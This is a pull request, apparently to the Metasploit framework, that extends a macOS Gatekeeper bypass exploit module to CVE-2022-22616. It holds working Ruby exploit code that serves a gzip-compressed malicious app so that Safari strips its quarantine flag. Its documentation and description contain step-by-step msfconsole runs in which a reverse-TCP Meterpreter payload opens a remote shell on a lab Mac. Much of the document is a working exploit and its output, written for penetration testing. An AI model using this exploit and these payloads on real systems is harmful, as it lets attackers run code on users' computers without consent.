### PR TITLE
Add CVE-2022-22616 to gatekeeper bypass module

### DIFF
--- a/documentation/modules/exploit/osx/browser/osx_gatekeeper_bypass.md
+++ b/documentation/modules/exploit/osx/browser/osx_gatekeeper_bypass.md
@@ -10,9 +10,9 @@ and clicking on the downloaded file will automatically launch the payload.
 If the user visits the site in another browser, the user must click once to unzip
 the app, and click again in order to execute the payload.
 
-For CVE-2022-22616, this module serves a gzip-compressed zip file that
-contains an OSX app. If the user downloads the file via Safari, Safari will
-automatically decompress the file, removing its `com.apple.quarantine` attribute.
+For CVE-2022-22616, this module serves a gzip-compressed zip file with its file header pointing
+to the `Contents` directory which contains an OSX app. If the user downloads the file via Safari,
+Safari will automatically decompress the file, removing its `com.apple.quarantine` attribute.
 Because of this, the file will not require quarantining, bypassing Gatekeeper on
 MacOS versions below 12.3.
 
@@ -117,50 +117,38 @@ BuildTuple   : x86_64-apple-darwin
 Meterpreter  : x64/osx
 ```
 
-### macOS Monterey 12.1
+### macOS Big Sur 11.5.2
 
 ```
 msf6 > use exploit/osx/browser/osx_gatekeeper_bypass
 [*] No payload configured, defaulting to osx/x64/meterpreter/reverse_tcp
 msf6 exploit(osx/browser/osx_gatekeeper_bypass) > set lhost 192.168.140.1
 lhost => 192.168.140.1
-msf6 exploit(osx/browser/osx_gatekeeper_bypass) > show targets
-
-Exploit targets:
-
-   Id  Name
-   --  ----
-   0   macOS x64 (Native Payload)
-   1   Python payload
-   2   Command payload
-
-
-msf6 exploit(osx/browser/osx_gatekeeper_bypass) > set target 1
-target => 1
-msf6 exploit(osx/browser/osx_gatekeeper_bypass) > set payload python/meterpreter/reverse_tcp
-payload => python/meterpreter/reverse_tcp
 msf6 exploit(osx/browser/osx_gatekeeper_bypass) > run
 [*] Exploit running as background job 0.
 [*] Exploit completed, but no session was created.
 
-[*] Started reverse TCP handler on 192.168.140.1:4444 
-msf6 exploit(osx/browser/osx_gatekeeper_bypass) > [*] Using URL: http://192.168.140.1:8080/0sJEWz
+[*] Started reverse TCP handler on 192.168.140.1:4444
+msf6 exploit(osx/browser/osx_gatekeeper_bypass) > [*] Using URL: http://192.168.140.1:8080/pUyNR5yWEqCu
 [*] Server started.
-[*] 192.168.140.133  osx_gatekeeper_bypass - Request /0sJEWz from Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
-[+] 192.168.140.133  osx_gatekeeper_bypass - macOS version 10.15.7 is vulnerable
-[*] Sending stage (39936 bytes) to 192.168.140.133
-[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.133:49153 ) at 2022-04-01 17:47:58 -0500
+msf6 exploit(osx/browser/osx_gatekeeper_bypass) >
+[*] 192.168.140.137  osx_gatekeeper_bypass - Request /pUyNR5yWEqCu from Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15
+[+] 192.168.140.137  osx_gatekeeper_bypass - Safari version 14.1.2 is vulnerable
+[*] Transmitting first stager...(210 bytes)
+[*] Transmitting second stager...(8192 bytes)
+[*] Sending stage (810576 bytes) to 192.168.140.137
+[*] Meterpreter session 2 opened (192.168.140.1:4444 -> 192.168.140.137:49355 ) at 2022-04-05 10:10:01 -0500
 
-msf6 exploit(osx/browser/osx_gatekeeper_bypass) > 
 msf6 exploit(osx/browser/osx_gatekeeper_bypass) > sessions -i -1
-[*] Starting interaction with 1...
+[*] Starting interaction with 2...
 
 meterpreter > getuid
 Server username: space
 meterpreter > sysinfo
 Computer     : spaces-Mac.local
-OS           : Darwin 21.2.0 Darwin Kernel Version 21.2.0: Sun Nov 28 20:28:54 PST 2021; root:xnu-8019.61.5~1/RELEASE_X86_64
+OS           :  (macOS 11.5.2)
 Architecture : x64
-Meterpreter  : python/osx
+BuildTuple   : x86_64-apple-darwin
+Meterpreter  : x64/osx
 meterpreter >
 ```

--- a/documentation/modules/exploit/osx/browser/osx_gatekeeper_bypass.md
+++ b/documentation/modules/exploit/osx/browser/osx_gatekeeper_bypass.md
@@ -1,12 +1,20 @@
 ## Vulnerable Application
 
-This module serves an OSX app (as a zip) that contains no Info.plist, which
-bypasses gatekeeper in macOS < 11.3.
+This module exploits two CVEs that bypass Gatekeeper.
+
+For CVE-2021-30657 this module serves an OSX app (as a zip) that contains
+no Info.plist, which bypasses gatekeeper in macOS < 11.3.
 
 If the user visits the site on Safari, the zip file is automatically extracted,
 and clicking on the downloaded file will automatically launch the payload.
 If the user visits the site in another browser, the user must click once to unzip
 the app, and click again in order to execute the payload.
+
+For CVE-2022-22616, this module serves a gzip-compressed zip file that
+contains an OSX app. If the user downloads the file via Safari, Safari will
+automatically decompress the file, removing its `com.apple.quarantine` attribute.
+Because of this, the file will not require quarantining, bypassing Gatekeeper on
+MacOS versions below 12.3.
 
 ## Verification Steps
 
@@ -19,7 +27,13 @@ the app, and click again in order to execute the payload.
 
 ## Options
 
-  No options
+### APP_NAME
+
+Name of the app to be served.
+
+### CVE
+
+The vulnerability to use in the exploit. The default value is the most recent cve (CVE-2022-22616).
 
 ## Scenarios
 
@@ -102,3 +116,50 @@ BuildTuple   : x86_64-apple-darwin
 Meterpreter  : x64/osx
 ```
 
+### macOS Monterey 12.1
+
+```
+msf6 > use exploit/osx/browser/osx_gatekeeper_bypass
+[*] No payload configured, defaulting to osx/x64/meterpreter/reverse_tcp
+msf6 exploit(osx/browser/osx_gatekeeper_bypass) > set lhost 192.168.140.1
+lhost => 192.168.140.1
+msf6 exploit(osx/browser/osx_gatekeeper_bypass) > show targets
+
+Exploit targets:
+
+   Id  Name
+   --  ----
+   0   macOS x64 (Native Payload)
+   1   Python payload
+   2   Command payload
+
+
+msf6 exploit(osx/browser/osx_gatekeeper_bypass) > set target 1
+target => 1
+msf6 exploit(osx/browser/osx_gatekeeper_bypass) > set payload python/meterpreter/reverse_tcp
+payload => python/meterpreter/reverse_tcp
+msf6 exploit(osx/browser/osx_gatekeeper_bypass) > run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 192.168.140.1:4444 
+msf6 exploit(osx/browser/osx_gatekeeper_bypass) > [*] Using URL: http://192.168.140.1:8080/0sJEWz
+[*] Server started.
+[*] 192.168.140.133  osx_gatekeeper_bypass - Request /0sJEWz from Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
+[+] 192.168.140.133  osx_gatekeeper_bypass - macOS version 10.15.7 is vulnerable
+[*] Sending stage (39936 bytes) to 192.168.140.133
+[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.133:49153 ) at 2022-04-01 17:47:58 -0500
+
+msf6 exploit(osx/browser/osx_gatekeeper_bypass) > 
+msf6 exploit(osx/browser/osx_gatekeeper_bypass) > sessions -i -1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: space
+meterpreter > sysinfo
+Computer     : spaces-Mac.local
+OS           : Darwin 21.2.0 Darwin Kernel Version 21.2.0: Sun Nov 28 20:28:54 PST 2021; root:xnu-8019.61.5~1/RELEASE_X86_64
+Architecture : x64
+Meterpreter  : python/osx
+meterpreter >
+```

--- a/documentation/modules/exploit/osx/browser/osx_gatekeeper_bypass.md
+++ b/documentation/modules/exploit/osx/browser/osx_gatekeeper_bypass.md
@@ -19,11 +19,12 @@ MacOS versions below 12.3.
 ## Verification Steps
 
 1. Start `msfconsole`
-1. `use exploit/osx/browser/osx_gatekeeper_bypass`
-1. `set LHOST <tab>`
-1. `set SRVHOST <tab>`
-1. `exploit`
-1. Visit the URL on a vulnerable version of macOS
+2. `use exploit/osx/browser/osx_gatekeeper_bypass`
+3. `set CVE <cve_num>`
+4. `set LHOST <tab>`
+5. `set SRVHOST <tab>`
+6. `exploit`
+7. Visit the URL on a vulnerable version of macOS
 
 ## Options
 

--- a/modules/exploits/osx/browser/osx_gatekeeper_bypass.rb
+++ b/modules/exploits/osx/browser/osx_gatekeeper_bypass.rb
@@ -15,24 +15,36 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'macOS Gatekeeper check bypass',
         'Description' => %q{
-          This module serves an OSX app (as a zip) that contains no Info.plist, which
-          bypasses gatekeeper in macOS < 11.3.
+          This module exploits two CVEs that bypass Gatekeeper.
+
+          For CVE-2021-30657, this module serves an OSX app (as a zip) that contains no
+          Info.plist, which bypasses gatekeeper in macOS < 11.3.
           If the user visits the site on Safari, the zip file is automatically extracted,
           and clicking on the downloaded file will automatically launch the payload.
           If the user visits the site in another browser, the user must click once to unzip
           the app, and click again in order to execute the payload.
+
+          For CVE-2022-22616, this module serves a gzip-compressed zip file that
+          contains an OSX app. If the user downloads the file via Safari, Safari will
+          automatically decompress the file, removing its `com.apple.quarantine` attribute.
+          Because of this, the file will not require quarantining, bypassing Gatekeeper on
+          MacOS versions below 12.3.
         },
         'License' => MSF_LICENSE,
         'Targets' => [
           [ 'macOS x64 (Native Payload)', { 'Arch' => ARCH_X64, 'Platform' => [ 'osx' ] } ],
           [ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],
-          [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],
+          [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ]
         ],
         'DefaultTarget' => 0,
         'DisclosureDate' => '2021-03-25',
         'Author' => [
-          'Cedric Owens', # Discovery
-          'timwr' # Module
+          'Cedric Owens', # CVE-2021-30657 Discovery
+          'timwr', # Module
+          'Ferdous Saljooki', # CVE-2022-22616 Discovery (@malwarezoo)
+          'Jaron Bradley', # CVE-2022-22616 Discovery (@jbradley89)
+          'Mickey Jin', # CVE-2022-22616 Discovery (@patch1t)
+          'Shelby Pace' # CVE-2022-22616 Additions
         ],
         'Notes' => {
           'Stability' => [ CRASH_SAFE ],
@@ -41,14 +53,22 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'References' => [
           ['CVE', '2021-30657'],
+          ['CVE', '2022-22616'],
           ['URL', 'https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508'],
           ['URL', 'https://objective-see.com/blog/blog_0x64.html'],
+          ['URL', 'https://jhftss.github.io/CVE-2022-22616-Gatekeeper-Bypass/'],
+          ['URL', 'https://www.jamf.com/blog/jamf-threat-labs-safari-vuln-gatekeeper-bypass/']
         ]
       )
     )
     register_options([
-      OptString.new('APP_NAME', [false, 'The application name (Default: app)', 'app'])
+      OptString.new('APP_NAME', [false, 'The application name (Default: app)', 'app']),
+      OptEnum.new('CVE', [true, 'The vulnerability to exploit', 'CVE-2022-22616', ['CVE-2021-30657', 'CVE-2022-22616']])
     ])
+  end
+
+  def cve
+    datastore['CVE']
   end
 
   def check_useragent(user_agent)
@@ -56,7 +76,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     osx_version = Regexp.last_match(1).gsub('_', '.')
     mac_osx_version = Rex::Version.new(osx_version)
-    if mac_osx_version >= Rex::Version.new('11.3')
+    if mac_osx_version >= Rex::Version.new('12.3')
       print_warning "macOS version #{mac_osx_version} is not vulnerable"
     elsif mac_osx_version < Rex::Version.new('10.15.6')
       print_warning "macOS version #{mac_osx_version} is not vulnerable"
@@ -64,7 +84,8 @@ class MetasploitModule < Msf::Exploit::Remote
       print_good "macOS version #{mac_osx_version} is vulnerable"
       return true
     end
-    return false
+
+    false
   end
 
   def on_request_uri(cli, request)
@@ -77,7 +98,16 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     app_name = datastore['APP_NAME'] || Rex::Text.rand_text_alpha(5)
-    send_response(cli, app_zip(app_name), { 'Content-Type' => 'application/zip', 'Content-Disposition' => "attachment; filename=\"#{app_name}.zip\"" })
+
+    app_file_name = "#{app_name}.zip"
+    zipped = app_zip(app_name)
+
+    if cve == 'CVE-2022-22616'
+      zipped = Rex::Text.gzip(zipped)
+      app_file_name = "#{app_file_name}.gz"
+    end
+
+    send_response(cli, zipped, { 'Content-Type' => 'application/zip', 'Content-Disposition' => "attachment; filename=\"#{app_file_name}\"" })
   end
 
   def app_zip(app_name)

--- a/modules/exploits/osx/browser/osx_gatekeeper_bypass.rb
+++ b/modules/exploits/osx/browser/osx_gatekeeper_bypass.rb
@@ -77,7 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote
       safari_version = Regexp.last_match(1)
     end
 
-    if Rex::Version.new(safari_version) < Rex::Version.new('15.4')
+    if safari_version && Rex::Version.new(safari_version) < Rex::Version.new('15.4') && cve == 'CVE-2022-22616'
       print_good("Safari version #{safari_version} is vulnerable")
       return true
     end

--- a/modules/exploits/osx/browser/osx_gatekeeper_bypass.rb
+++ b/modules/exploits/osx/browser/osx_gatekeeper_bypass.rb
@@ -24,9 +24,9 @@ class MetasploitModule < Msf::Exploit::Remote
           If the user visits the site in another browser, the user must click once to unzip
           the app, and click again in order to execute the payload.
 
-          For CVE-2022-22616, this module serves a gzip-compressed zip file that
-          contains an OSX app. If the user downloads the file via Safari, Safari will
-          automatically decompress the file, removing its `com.apple.quarantine` attribute.
+          For CVE-2022-22616, this module serves a gzip-compressed zip file with its file header pointing
+          to the `Contents` directory which contains an OSX app. If the user downloads the file via Safari,
+          Safari will automatically decompress the file, removing its `com.apple.quarantine` attribute.
           Because of this, the file will not require quarantining, bypassing Gatekeeper on
           MacOS versions below 12.3.
         },
@@ -72,6 +72,16 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check_useragent(user_agent)
+    safari_version = nil
+    if user_agent =~ %r{Version/(\d+\.\d+(\.\d+)*)\sSafari}
+      safari_version = Regexp.last_match(1)
+    end
+
+    if Rex::Version.new(safari_version) < Rex::Version.new('15.4')
+      print_good("Safari version #{safari_version} is vulnerable")
+      return true
+    end
+
     return false unless user_agent =~ /Intel Mac OS X (.*?)\)/
 
     osx_version = Regexp.last_match(1).gsub('_', '.')
@@ -128,7 +138,7 @@ class MetasploitModule < Msf::Exploit::Remote
     SCRIPT
 
     zip = Rex::Zip::Archive.new
-    zip.add_file("#{app_name}.app/", '')
+    zip.add_file("#{app_name}.app/", '') if cve != 'CVE-2022-22616'
     zip.add_file("#{app_name}.app/Contents/", '')
     zip.add_file("#{app_name}.app/Contents/MacOS/", '')
     zip.add_file("#{app_name}.app/Contents/MacOS/#{app_name}", shell_script).last.attrs = 0o777


### PR DESCRIPTION
## Description

This adds support for CVE-2022-22616 to the existing Gatekeeper bypass exploit module which reportedly covers MacOS Big Sur all the way to MacOS Monterey versions below 12.3. Since this now targets two CVEs, I've introduced a new `CVE` option to select which CVE to exploit. This default is the most recent CVE.

**Notes**: Currently, the native OSX payload / target dies during exploitation. Not sure if that is related to the exploit itself or if there's an issue with the payload, so I'll try and look into that next week.

## Verification

- [ ] Start `msfconsole`
- [ ] `use exploit/osx/browser/osx_gatekeeper_bypass`
- [ ] `set CVE <cve_num>`
- [ ] `set LHOST <tab>`
- [ ] `set SRVHOST <tab>`
- [ ] `exploit`
- [ ] Visit the URL on a vulnerable version of macOS

## Scenarios

```
msf6 > use exploit/osx/browser/osx_gatekeeper_bypass
[*] No payload configured, defaulting to osx/x64/meterpreter/reverse_tcp
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   macOS x64 (Native Payload)
   1   Python payload
   2   Command payload


msf6 exploit(osx/browser/osx_gatekeeper_bypass) > set target 1
target => 1
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.140.1:4444 
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > [*] Using URL: http://192.168.140.1:8080/0sJEWz
[*] Server started.
[*] 192.168.140.133  osx_gatekeeper_bypass - Request /0sJEWz from Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
[+] 192.168.140.133  osx_gatekeeper_bypass - macOS version 10.15.7 is vulnerable
[*] Sending stage (39936 bytes) to 192.168.140.133
[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.133:49153 ) at 2022-04-01 17:47:58 -0500

msf6 exploit(osx/browser/osx_gatekeeper_bypass) > 
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: space
meterpreter > sysinfo
Computer     : spaces-Mac.local
OS           : Darwin 21.2.0 Darwin Kernel Version 21.2.0: Sun Nov 28 20:28:54 PST 2021; root:xnu-8019.61.5~1/RELEASE_X86_64
Architecture : x64
Meterpreter  : python/osx
meterpreter >
```